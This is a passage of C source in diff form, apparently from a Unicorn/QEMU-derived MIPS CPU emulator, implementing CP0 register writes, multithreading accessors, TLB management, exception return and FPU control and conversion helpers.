*/ + env->CP0_WatchLo[sel] = (arg1 & ~0x7); +} + +void helper_mtc0_watchhi(CPUMIPSState *env, target_ulong arg1, uint32_t sel) +{ + env->CP0_WatchHi[sel] = (arg1 & 0x40FF0FF8); + env->CP0_WatchHi[sel] &= ~(env->CP0_WatchHi[sel] & arg1 & 0x7); +} + +void helper_mtc0_xcontext(CPUMIPSState *env, target_ulong arg1) +{ + target_ulong mask = (1ULL << (env->SEGBITS - 7)) - 1; + env->CP0_XContext = (env->CP0_XContext & mask) | (arg1 & ~mask); +} + +void helper_mtc0_framemask(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_Framemask = arg1; /* XXX */ +} + +void helper_mtc0_debug(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_Debug = (env->CP0_Debug & 0x8C03FC1F) | (arg1 & 0x13300120); + if (arg1 & (1 << CP0DB_DM)) + env->hflags |= MIPS_HFLAG_DM; + else + env->hflags &= ~MIPS_HFLAG_DM; +} + +void helper_mttc0_debug(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + uint32_t val = arg1 & ((1 << CP0DB_SSt) | (1 << CP0DB_Halt)); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + /* XXX: Might be wrong, check with EJTAG spec. 
*/ + if (other_tc == other->current_tc) + other->active_tc.CP0_Debug_tcstatus = val; + else + other->tcs[other_tc].CP0_Debug_tcstatus = val; + other->CP0_Debug = (other->CP0_Debug & + ((1 << CP0DB_SSt) | (1 << CP0DB_Halt))) | + (arg1 & ~((1 << CP0DB_SSt) | (1 << CP0DB_Halt))); +} + +void helper_mtc0_performance0(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_Performance0 = arg1 & 0x000007ff; +} + +void helper_mtc0_taglo(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_TagLo = arg1 & 0xFFFFFCF6; +} + +void helper_mtc0_datalo(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_DataLo = arg1; /* XXX */ +} + +void helper_mtc0_taghi(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_TagHi = arg1; /* XXX */ +} + +void helper_mtc0_datahi(CPUMIPSState *env, target_ulong arg1) +{ + env->CP0_DataHi = arg1; /* XXX */ +} + +/* MIPS MT functions */ +target_ulong helper_mftgpr(CPUMIPSState *env, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.gpr[sel]; + else + return other->tcs[other_tc].gpr[sel]; +} + +target_ulong helper_mftlo(CPUMIPSState *env, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.LO[sel]; + else + return other->tcs[other_tc].LO[sel]; +} + +target_ulong helper_mfthi(CPUMIPSState *env, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.HI[sel]; + else + return other->tcs[other_tc].HI[sel]; +} + +target_ulong helper_mftacx(CPUMIPSState *env, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == 
other->current_tc) + return other->active_tc.ACX[sel]; + else + return other->tcs[other_tc].ACX[sel]; +} + +target_ulong helper_mftdsp(CPUMIPSState *env) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + return other->active_tc.DSPControl; + else + return other->tcs[other_tc].DSPControl; +} + +void helper_mttgpr(CPUMIPSState *env, target_ulong arg1, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.gpr[sel] = arg1; + else + other->tcs[other_tc].gpr[sel] = arg1; +} + +void helper_mttlo(CPUMIPSState *env, target_ulong arg1, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.LO[sel] = arg1; + else + other->tcs[other_tc].LO[sel] = arg1; +} + +void helper_mtthi(CPUMIPSState *env, target_ulong arg1, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.HI[sel] = arg1; + else + other->tcs[other_tc].HI[sel] = arg1; +} + +void helper_mttacx(CPUMIPSState *env, target_ulong arg1, uint32_t sel) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.ACX[sel] = arg1; + else + other->tcs[other_tc].ACX[sel] = arg1; +} + +void helper_mttdsp(CPUMIPSState *env, target_ulong arg1) +{ + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); + + if (other_tc == other->current_tc) + other->active_tc.DSPControl = arg1; + else + 
other->tcs[other_tc].DSPControl = arg1; +} + +/* MIPS MT functions */ +target_ulong helper_dmt(void) +{ + // TODO + return 0; +} + +target_ulong helper_emt(void) +{ + // TODO + return 0; +} + +target_ulong helper_dvpe(CPUMIPSState *env) +{ + //struct uc_struct *uc = env->uc; + //CPUState *other_cs = uc->cpu; + target_ulong prev = env->mvp->CP0_MVPControl; + + // TODO: #642 SMP groups + /* + CPU_FOREACH(other_cs) { + MIPSCPU *other_cpu = MIPS_CPU(uc, other_cs); + // Turn off all VPEs except the one executing the dvpe. + if (&other_cpu->env != env) { + other_cpu->env.mvp->CP0_MVPControl &= ~(1 << CP0MVPCo_EVP); + mips_vpe_sleep(other_cpu); + } + } + */ + return prev; +} + +target_ulong helper_evpe(CPUMIPSState *env) +{ + //struct uc_struct *uc = env->uc; + //CPUState *other_cs = uc->cpu; + target_ulong prev = env->mvp->CP0_MVPControl; + + // TODO: #642 SMP groups + /* + CPU_FOREACH(other_cs) { + MIPSCPU *other_cpu = MIPS_CPU(uc, other_cs); + + if (&other_cpu->env != env + // If the VPE is WFI, don't disturb its sleep. + && !mips_vpe_is_wfi(other_cpu)) { + // Enable the VPE. + other_cpu->env.mvp->CP0_MVPControl |= (1 << CP0MVPCo_EVP); + mips_vpe_wake(other_cpu); // And wake it up. + } + } + */ + return prev; +} +#endif /* !CONFIG_USER_ONLY */ + +void helper_fork(target_ulong arg1, target_ulong arg2) +{ + // arg1 = rt, arg2 = rs + // TODO: store to TC register +} + +target_ulong helper_yield(CPUMIPSState *env, target_ulong arg) +{ + target_long arg1 = arg; + + if (arg1 < 0) { + /* No scheduling policy implemented. 
*/ + if (arg1 != -2) { + if (env->CP0_VPEControl & (1 << CP0VPECo_YSI) && + env->active_tc.CP0_TCStatus & (1 << CP0TCSt_DT)) { + env->CP0_VPEControl &= ~(0x7 << CP0VPECo_EXCPT); + env->CP0_VPEControl |= 4 << CP0VPECo_EXCPT; + helper_raise_exception(env, EXCP_THREAD); + } + } + } else if (arg1 == 0) { + if (0 /* TODO: TC underflow */) { + env->CP0_VPEControl &= ~(0x7 << CP0VPECo_EXCPT); + helper_raise_exception(env, EXCP_THREAD); + } else { + // TODO: Deallocate TC + } + } else if (arg1 > 0) { + /* Yield qualifier inputs not implemented. */ + env->CP0_VPEControl &= ~(0x7 << CP0VPECo_EXCPT); + env->CP0_VPEControl |= 2 << CP0VPECo_EXCPT; + helper_raise_exception(env, EXCP_THREAD); + } + return env->CP0_YQMask; +} + +#ifndef CONFIG_USER_ONLY +/* TLB management */ +static void cpu_mips_tlb_flush (CPUMIPSState *env, int flush_global) +{ + MIPSCPU *cpu = mips_env_get_cpu(env); + + /* Flush qemu's TLB and discard all shadowed entries. */ + tlb_flush(CPU(cpu), flush_global); + env->tlb->tlb_in_use = env->tlb->nb_tlb; +} + +static void r4k_mips_tlb_flush_extra (CPUMIPSState *env, int first) +{ + /* Discard entries from env->tlb[first] onwards. 
*/ + while (env->tlb->tlb_in_use > first) { + r4k_invalidate_tlb(env, --env->tlb->tlb_in_use, 0); + } +} + +static void r4k_fill_tlb(CPUMIPSState *env, int idx) +{ + r4k_tlb_t *tlb; + + /* XXX: detect conflicting TLBs and raise a MCHECK exception when needed */ + tlb = &env->tlb->mmu.r4k.tlb[idx]; + if (env->CP0_EntryHi & (1 << CP0EnHi_EHINV)) { + tlb->EHINV = 1; + return; + } + tlb->EHINV = 0; + tlb->VPN = env->CP0_EntryHi & (((unsigned int)TARGET_PAGE_MASK) << 1); +#if defined(TARGET_MIPS64) + tlb->VPN &= env->SEGMask; +#endif + tlb->ASID = env->CP0_EntryHi & 0xFF; + tlb->PageMask = env->CP0_PageMask; + tlb->G = env->CP0_EntryLo0 & env->CP0_EntryLo1 & 1; + tlb->V0 = (env->CP0_EntryLo0 & 2) != 0; + tlb->D0 = (env->CP0_EntryLo0 & 4) != 0; + tlb->C0 = (env->CP0_EntryLo0 >> 3) & 0x7; + tlb->XI0 = (env->CP0_EntryLo0 >> CP0EnLo_XI) & 1; + tlb->RI0 = (env->CP0_EntryLo0 >> CP0EnLo_RI) & 1; + tlb->PFN[0] = (env->CP0_EntryLo0 >> 6) << 12; + tlb->V1 = (env->CP0_EntryLo1 & 2) != 0; + tlb->D1 = (env->CP0_EntryLo1 & 4) != 0; + tlb->C1 = (env->CP0_EntryLo1 >> 3) & 0x7; + tlb->XI1 = (env->CP0_EntryLo1 >> CP0EnLo_XI) & 1; + tlb->RI1 = (env->CP0_EntryLo1 >> CP0EnLo_RI) & 1; + tlb->PFN[1] = (env->CP0_EntryLo1 >> 6) << 12; +} + +void r4k_helper_tlbinv(CPUMIPSState *env) +{ + int idx; + r4k_tlb_t *tlb; + uint8_t ASID = env->CP0_EntryHi & 0xFF; + + for (idx = 0; idx < env->tlb->nb_tlb; idx++) { + tlb = &env->tlb->mmu.r4k.tlb[idx]; + if (!tlb->G && tlb->ASID == ASID) { + tlb->EHINV = 1; + } + } + cpu_mips_tlb_flush(env, 1); +} + +void r4k_helper_tlbinvf(CPUMIPSState *env) +{ + int idx; + + for (idx = 0; idx < env->tlb->nb_tlb; idx++) { + env->tlb->mmu.r4k.tlb[idx].EHINV = 1; + } + cpu_mips_tlb_flush(env, 1); +} + +void r4k_helper_tlbwi(CPUMIPSState *env) +{ + r4k_tlb_t *tlb; + int idx; + target_ulong VPN; + uint8_t ASID; + bool G, V0, D0, V1, D1; + + idx = (env->CP0_Index & ~0x80000000) % env->tlb->nb_tlb; + tlb = &env->tlb->mmu.r4k.tlb[idx]; + VPN = env->CP0_EntryHi & (((unsigned 
int)TARGET_PAGE_MASK) << 1); +#if defined(TARGET_MIPS64) + VPN &= env->SEGMask; +#endif + ASID = env->CP0_EntryHi & 0xff; + G = env->CP0_EntryLo0 & env->CP0_EntryLo1 & 1; + V0 = (env->CP0_EntryLo0 & 2) != 0; + D0 = (env->CP0_EntryLo0 & 4) != 0; + V1 = (env->CP0_EntryLo1 & 2) != 0; + D1 = (env->CP0_EntryLo1 & 4) != 0; + + /* Discard cached TLB entries, unless tlbwi is just upgrading access + permissions on the current entry. */ + if (tlb->VPN != VPN || tlb->ASID != ASID || tlb->G != G || + (tlb->V0 && !V0) || (tlb->D0 && !D0) || + (tlb->V1 && !V1) || (tlb->D1 && !D1)) { + r4k_mips_tlb_flush_extra(env, env->tlb->nb_tlb); + } + + r4k_invalidate_tlb(env, idx, 0); + r4k_fill_tlb(env, idx); +} + +void r4k_helper_tlbwr(CPUMIPSState *env) +{ + int r = cpu_mips_get_random(env); + + r4k_invalidate_tlb(env, r, 1); + r4k_fill_tlb(env, r); +} + +void r4k_helper_tlbp(CPUMIPSState *env) +{ + r4k_tlb_t *tlb; + target_ulong mask; + target_ulong tag; + target_ulong VPN; + uint8_t ASID; + int i; + + ASID = env->CP0_EntryHi & 0xFF; + for (i = 0; i < env->tlb->nb_tlb; i++) { + tlb = &env->tlb->mmu.r4k.tlb[i]; + /* 1k pages are not supported. */ + mask = tlb->PageMask | ~(((unsigned int)TARGET_PAGE_MASK) << 1); + tag = env->CP0_EntryHi & ~mask; + VPN = tlb->VPN & ~mask; +#if defined(TARGET_MIPS64) + tag &= env->SEGMask; +#endif + /* Check ASID, virtual page number & size */ + if ((tlb->G == 1 || tlb->ASID == ASID) && VPN == tag && !tlb->EHINV) { + /* TLB match */ + env->CP0_Index = i; + break; + } + } + if (i == env->tlb->nb_tlb) { + /* No match. Discard any shadow entries, if any of them match. */ + for (i = env->tlb->nb_tlb; i < env->tlb->tlb_in_use; i++) { + tlb = &env->tlb->mmu.r4k.tlb[i]; + /* 1k pages are not supported. 
*/ + mask = tlb->PageMask | ~(((unsigned int)TARGET_PAGE_MASK) << 1); + tag = env->CP0_EntryHi & ~mask; + VPN = tlb->VPN & ~mask; +#if defined(TARGET_MIPS64) + tag &= env->SEGMask; +#endif + /* Check ASID, virtual page number & size */ + if ((tlb->G == 1 || tlb->ASID == ASID) && VPN == tag) { + r4k_mips_tlb_flush_extra (env, i); + break; + } + } + + env->CP0_Index |= 0x80000000; + } +} + +void r4k_helper_tlbr(CPUMIPSState *env) +{ + r4k_tlb_t *tlb; + uint8_t ASID; + int idx; + + ASID = env->CP0_EntryHi & 0xFF; + idx = (env->CP0_Index & ~0x80000000) % env->tlb->nb_tlb; + tlb = &env->tlb->mmu.r4k.tlb[idx]; + + /* If this will change the current ASID, flush qemu's TLB. */ + if (ASID != tlb->ASID) + cpu_mips_tlb_flush (env, 1); + + r4k_mips_tlb_flush_extra(env, env->tlb->nb_tlb); + + if (tlb->EHINV) { + env->CP0_EntryHi = 1 << CP0EnHi_EHINV; + env->CP0_PageMask = 0; + env->CP0_EntryLo0 = 0; + env->CP0_EntryLo1 = 0; + } else { + env->CP0_EntryHi = tlb->VPN | tlb->ASID; + env->CP0_PageMask = tlb->PageMask; + env->CP0_EntryLo0 = tlb->G | (tlb->V0 << 1) | (tlb->D0 << 2) | + ((target_ulong)tlb->RI0 << CP0EnLo_RI) | + ((target_ulong)tlb->XI0 << CP0EnLo_XI) | + (tlb->C0 << 3) | (tlb->PFN[0] >> 6); + env->CP0_EntryLo1 = tlb->G | (tlb->V1 << 1) | (tlb->D1 << 2) | + ((target_ulong)tlb->RI1 << CP0EnLo_RI) | + ((target_ulong)tlb->XI1 << CP0EnLo_XI) | + (tlb->C1 << 3) | (tlb->PFN[1] >> 6); + } +} + +void helper_tlbwi(CPUMIPSState *env) +{ + env->tlb->helper_tlbwi(env); +} + +void helper_tlbwr(CPUMIPSState *env) +{ + env->tlb->helper_tlbwr(env); +} + +void helper_tlbp(CPUMIPSState *env) +{ + env->tlb->helper_tlbp(env); +} + +void helper_tlbr(CPUMIPSState *env) +{ + env->tlb->helper_tlbr(env); +} + +void helper_tlbinv(CPUMIPSState *env) +{ + env->tlb->helper_tlbinv(env); +} + +void helper_tlbinvf(CPUMIPSState *env) +{ + env->tlb->helper_tlbinvf(env); +} + +/* Specials */ +target_ulong helper_di(CPUMIPSState *env) +{ + target_ulong t0 = env->CP0_Status; + + env->CP0_Status = t0 & ~(1 
<< CP0St_IE); + return t0; +} + +target_ulong helper_ei(CPUMIPSState *env) +{ + target_ulong t0 = env->CP0_Status; + + env->CP0_Status = t0 | (1 << CP0St_IE); + return t0; +} + +static void debug_pre_eret(CPUMIPSState *env) +{ + if (qemu_loglevel_mask(CPU_LOG_EXEC)) { + qemu_log("ERET: PC " TARGET_FMT_lx " EPC " TARGET_FMT_lx, + env->active_tc.PC, env->CP0_EPC); + if (env->CP0_Status & (1 << CP0St_ERL)) + qemu_log(" ErrorEPC " TARGET_FMT_lx, env->CP0_ErrorEPC); + if (env->hflags & MIPS_HFLAG_DM) + qemu_log(" DEPC " TARGET_FMT_lx, env->CP0_DEPC); + qemu_log("\n"); + } +} + +static void debug_post_eret(CPUMIPSState *env) +{ + MIPSCPU *cpu = mips_env_get_cpu(env); + + if (qemu_loglevel_mask(CPU_LOG_EXEC)) { + qemu_log(" => PC " TARGET_FMT_lx " EPC " TARGET_FMT_lx, + env->active_tc.PC, env->CP0_EPC); + if (env->CP0_Status & (1 << CP0St_ERL)) + qemu_log(" ErrorEPC " TARGET_FMT_lx, env->CP0_ErrorEPC); + if (env->hflags & MIPS_HFLAG_DM) + qemu_log(" DEPC " TARGET_FMT_lx, env->CP0_DEPC); + switch (env->hflags & MIPS_HFLAG_KSU) { + case MIPS_HFLAG_UM: qemu_log(", UM\n"); break; + case MIPS_HFLAG_SM: qemu_log(", SM\n"); break; + case MIPS_HFLAG_KM: qemu_log("\n"); break; + default: + cpu_abort(CPU(cpu), "Invalid MMU mode!\n"); + break; + } + } +} + +static void set_pc(CPUMIPSState *env, target_ulong error_pc) +{ + env->active_tc.PC = error_pc & ~(target_ulong)1; + if (error_pc & 1) { + env->hflags |= MIPS_HFLAG_M16; + } else { + env->hflags &= ~(MIPS_HFLAG_M16); + } +} + +void helper_eret(CPUMIPSState *env) +{ + debug_pre_eret(env); + if (env->CP0_Status & (1 << CP0St_ERL)) { + set_pc(env, env->CP0_ErrorEPC); + env->CP0_Status &= ~(1 << CP0St_ERL); + } else { + set_pc(env, env->CP0_EPC); + env->CP0_Status &= ~(1 << CP0St_EXL); + } + compute_hflags(env); + debug_post_eret(env); + env->lladdr = 1; +} + +void helper_deret(CPUMIPSState *env) +{ + debug_pre_eret(env); + set_pc(env, env->CP0_DEPC); + + env->hflags &= MIPS_HFLAG_DM; + compute_hflags(env); + debug_post_eret(env); + 
env->lladdr = 1; +} +#endif /* !CONFIG_USER_ONLY */ + +target_ulong helper_rdhwr_cpunum(CPUMIPSState *env) +{ + if ((env->hflags & MIPS_HFLAG_CP0) || + (env->CP0_HWREna & (1 << 0))) + return env->CP0_EBase & 0x3ff; + else + helper_raise_exception(env, EXCP_RI); + + return 0; +} + +target_ulong helper_rdhwr_synci_step(CPUMIPSState *env) +{ + if ((env->hflags & MIPS_HFLAG_CP0) || + (env->CP0_HWREna & (1 << 1))) + return env->SYNCI_Step; + else + helper_raise_exception(env, EXCP_RI); + + return 0; +} + +target_ulong helper_rdhwr_cc(CPUMIPSState *env) +{ + if ((env->hflags & MIPS_HFLAG_CP0) || + (env->CP0_HWREna & (1 << 2))) + return env->CP0_Count; + else + helper_raise_exception(env, EXCP_RI); + + return 0; +} + +target_ulong helper_rdhwr_ccres(CPUMIPSState *env) +{ + if ((env->hflags & MIPS_HFLAG_CP0) || + (env->CP0_HWREna & (1 << 3))) + return env->CCRes; + else + helper_raise_exception(env, EXCP_RI); + + return 0; +} + +void helper_pmon(CPUMIPSState *env, int function) +{ + function /= 2; + switch (function) { + case 2: /* TODO: char inbyte(int waitflag); */ + if (env->active_tc.gpr[4] == 0) + env->active_tc.gpr[2] = -1; + /* Fall through */ + case 11: /* TODO: char inbyte (void); */ + env->active_tc.gpr[2] = -1; + break; + case 3: + case 12: + printf("%c", (char)(env->active_tc.gpr[4] & 0xFF)); + break; + case 17: + break; + case 158: + { + unsigned char *fmt = (void *)(uintptr_t)env->active_tc.gpr[4]; + printf("%s", fmt); + } + break; + } +} + +void helper_wait(CPUMIPSState *env) +{ + CPUState *cs = CPU(mips_env_get_cpu(env)); + + cs->halted = 1; + cpu_reset_interrupt(cs, CPU_INTERRUPT_WAKE); + helper_raise_exception(env, EXCP_HLT); +} + +#if !defined(CONFIG_USER_ONLY) + +void mips_cpu_do_unaligned_access(CPUState *cs, vaddr addr, + int access_type, int is_user, + uintptr_t retaddr) +{ + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; + int error_code = 0; + int excp; + + env->CP0_BadVAddr = addr; + + if (access_type == MMU_DATA_STORE) { + 
excp = EXCP_AdES; + } else { + excp = EXCP_AdEL; + if (access_type == MMU_INST_FETCH) { + error_code |= EXCP_INST_NOTAVAIL; + } + } + + do_raise_exception_err(env, excp, error_code, retaddr); +} + +void tlb_fill(CPUState *cs, target_ulong addr, int is_write, int mmu_idx, + uintptr_t retaddr) +{ + int ret; + + ret = mips_cpu_handle_mmu_fault(cs, addr, is_write, mmu_idx); + if (ret) { + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; + + do_raise_exception_err(env, cs->exception_index, + env->error_code, retaddr); + } +} + +void mips_cpu_unassigned_access(CPUState *cs, hwaddr addr, + bool is_write, bool is_exec, int unused, + unsigned size) +{ + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; + + /* + * Raising an exception with KVM enabled will crash because it won't be from + * the main execution loop so the longjmp won't have a matching setjmp. + * Until we can trigger a bus error exception through KVM lets just ignore + * the access. + */ + if (is_exec) { + helper_raise_exception(env, EXCP_IBE); + } else { + helper_raise_exception(env, EXCP_DBE); + } +} +#endif /* !CONFIG_USER_ONLY */ + +/* Complex FPU operations which may need stack space. 
*/ + +#define FLOAT_TWO32 make_float32(1 << 30) +#define FLOAT_TWO64 make_float64(1ULL << 62) +#define FP_TO_INT32_OVERFLOW 0x7fffffff +#define FP_TO_INT64_OVERFLOW 0x7fffffffffffffffULL + +/* convert MIPS rounding mode in FCR31 to IEEE library */ +unsigned int ieee_rm[] = { + float_round_nearest_even, + float_round_to_zero, + float_round_up, + float_round_down +}; + +static inline void restore_rounding_mode(CPUMIPSState *env) +{ + set_float_rounding_mode(ieee_rm[env->active_fpu.fcr31 & 3], + &env->active_fpu.fp_status); +} + +static inline void restore_flush_mode(CPUMIPSState *env) +{ + set_flush_to_zero((env->active_fpu.fcr31 & (1 << 24)) != 0, + &env->active_fpu.fp_status); +} + +target_ulong helper_cfc1(CPUMIPSState *env, uint32_t reg) +{ + target_ulong arg1 = 0; + + switch (reg) { + case 0: + arg1 = (int32_t)env->active_fpu.fcr0; + break; + case 1: + /* UFR Support - Read Status FR */ + if (env->active_fpu.fcr0 & (1 << FCR0_UFRP)) { + if (env->CP0_Config5 & (1 << CP0C5_UFR)) { + arg1 = (int32_t) + ((env->CP0_Status & (1 << CP0St_FR)) >> CP0St_FR); + } else { + helper_raise_exception(env, EXCP_RI); + } + } + break; + case 25: + arg1 = ((env->active_fpu.fcr31 >> 24) & 0xfe) | ((env->active_fpu.fcr31 >> 23) & 0x1); + break; + case 26: + arg1 = env->active_fpu.fcr31 & 0x0003f07c; + break; + case 28: + arg1 = (env->active_fpu.fcr31 & 0x00000f83) | ((env->active_fpu.fcr31 >> 22) & 0x4); + break; + default: + arg1 = (int32_t)env->active_fpu.fcr31; + break; + } + + return arg1; +} + +void helper_ctc1(CPUMIPSState *env, target_ulong arg1, uint32_t fs, uint32_t rt) +{ + switch (fs) { + case 1: + /* UFR Alias - Reset Status FR */ + if (!((env->active_fpu.fcr0 & (1 << FCR0_UFRP)) && (rt == 0))) { + return; + } + if (env->CP0_Config5 & (1 << CP0C5_UFR)) { + env->CP0_Status &= ~(1 << CP0St_FR); + compute_hflags(env); + } else { + helper_raise_exception(env, EXCP_RI); + } + break; + case 4: + /* UNFR Alias - Set Status FR */ + if (!((env->active_fpu.fcr0 & (1 << FCR0_UFRP)) 
&& (rt == 0))) { + return; + } + if (env->CP0_Config5 & (1 << CP0C5_UFR)) { + env->CP0_Status |= (1 << CP0St_FR); + compute_hflags(env); + } else { + helper_raise_exception(env, EXCP_RI); + } + break; + case 25: + if ((env->insn_flags & ISA_MIPS32R6) || (arg1 & 0xffffff00)) { + return; + } + env->active_fpu.fcr31 = (env->active_fpu.fcr31 & 0x017fffff) | ((arg1 & 0xfe) << 24) | + ((arg1 & 0x1) << 23); + break; + case 26: + if (arg1 & 0x007c0000) + return; + env->active_fpu.fcr31 = (env->active_fpu.fcr31 & 0xfffc0f83) | (arg1 & 0x0003f07c); + break; + case 28: + if (arg1 & 0x007c0000) + return; + env->active_fpu.fcr31 = (env->active_fpu.fcr31 & 0xfefff07c) | (arg1 & 0x00000f83) | + ((arg1 & 0x4) << 22); + break; + case 31: + if (env->insn_flags & ISA_MIPS32R6) { + uint32_t mask = 0xfefc0000; + env->active_fpu.fcr31 = (arg1 & ~mask) | + (env->active_fpu.fcr31 & mask); + } else if (!(arg1 & 0x007c0000)) { + env->active_fpu.fcr31 = arg1; + } + break; + default: + return; + } + /* set rounding mode */ + restore_rounding_mode(env); + /* set flush-to-zero mode */ + restore_flush_mode(env); + set_float_exception_flags(0, &env->active_fpu.fp_status); + if ((GET_FP_ENABLE(env->active_fpu.fcr31) | 0x20) & GET_FP_CAUSE(env->active_fpu.fcr31)) + do_raise_exception(env, EXCP_FPE, GETPC()); +} + +int ieee_ex_to_mips(int xcpt) +{ + int ret = 0; + if (xcpt) { + if (xcpt & float_flag_invalid) { + ret |= FP_INVALID; + } + if (xcpt & float_flag_overflow) { + ret |= FP_OVERFLOW; + } + if (xcpt & float_flag_underflow) { + ret |= FP_UNDERFLOW; + } + if (xcpt & float_flag_divbyzero) { + ret |= FP_DIV0; + } + if (xcpt & float_flag_inexact) { + ret |= FP_INEXACT; + } + } + return ret; +} + +static inline void update_fcr31(CPUMIPSState *env, uintptr_t pc) +{ + int tmp = ieee_ex_to_mips(get_float_exception_flags(&env->active_fpu.fp_status)); + + SET_FP_CAUSE(env->active_fpu.fcr31, tmp); + + if (tmp) { + set_float_exception_flags(0, &env->active_fpu.fp_status); + + if 
(GET_FP_ENABLE(env->active_fpu.fcr31) & tmp) { + do_raise_exception(env, EXCP_FPE, pc); + } else { + UPDATE_FP_FLAGS(env->active_fpu.fcr31, tmp); + } + } +} + +/* Float support. + Single precition routines have a "s" suffix, double precision a + "d" suffix, 32bit integer "w", 64bit integer "l", paired single "ps", + paired single lower "pl", paired single upper "pu". */ + +/* unary operations, modifying fp status */ +uint64_t helper_float_sqrt_d(CPUMIPSState *env, uint64_t fdt0) +{ + fdt0 = float64_sqrt(fdt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt0; +} + +uint32_t helper_float_sqrt_s(CPUMIPSState *env, uint32_t fst0) +{ + fst0 = float32_sqrt(fst0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst0; +} + +uint64_t helper_float_cvtd_s(CPUMIPSState *env, uint32_t fst0) +{ + uint64_t fdt2; + + fdt2 = float32_to_float64(fst0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint64_t helper_float_cvtd_w(CPUMIPSState *env, uint32_t wt0) +{ + uint64_t fdt2; + + fdt2 = int32_to_float64(wt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint64_t helper_float_cvtd_l(CPUMIPSState *env, uint64_t dt0) +{ + uint64_t fdt2; + + fdt2 = int64_to_float64(dt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint64_t helper_float_cvtl_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t dt2; + + dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint64_t helper_float_cvtl_s(CPUMIPSState *env, uint32_t fst0) +{ + uint64_t dt2; + + dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + 
update_fcr31(env, GETPC()); + return dt2; +} + +uint64_t helper_float_cvtps_pw(CPUMIPSState *env, uint64_t dt0) +{ + uint32_t fst2; + uint32_t fsth2; + + fst2 = int32_to_float32(dt0 & 0XFFFFFFFF, &env->active_fpu.fp_status); + fsth2 = int32_to_float32(dt0 >> 32, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return ((uint64_t)fsth2 << 32) | fst2; +} + +uint64_t helper_float_cvtpw_ps(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t wt2; + uint32_t wth2; + int excp, excph; + + wt2 = float32_to_int32(fdt0 & 0XFFFFFFFF, &env->active_fpu.fp_status); + excp = get_float_exception_flags(&env->active_fpu.fp_status); + if (excp & (float_flag_overflow | float_flag_invalid)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + + set_float_exception_flags(0, &env->active_fpu.fp_status); + wth2 = float32_to_int32(fdt0 >> 32, &env->active_fpu.fp_status); + excph = get_float_exception_flags(&env->active_fpu.fp_status); + if (excph & (float_flag_overflow | float_flag_invalid)) { + wth2 = FP_TO_INT32_OVERFLOW; + } + + set_float_exception_flags(excp | excph, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + + return ((uint64_t)wth2 << 32) | wt2; +} + +uint32_t helper_float_cvts_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t fst2; + + fst2 = float64_to_float32(fdt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst2; +} + +uint32_t helper_float_cvts_w(CPUMIPSState *env, uint32_t wt0) +{ + uint32_t fst2; + + fst2 = int32_to_float32(wt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst2; +} + +uint32_t 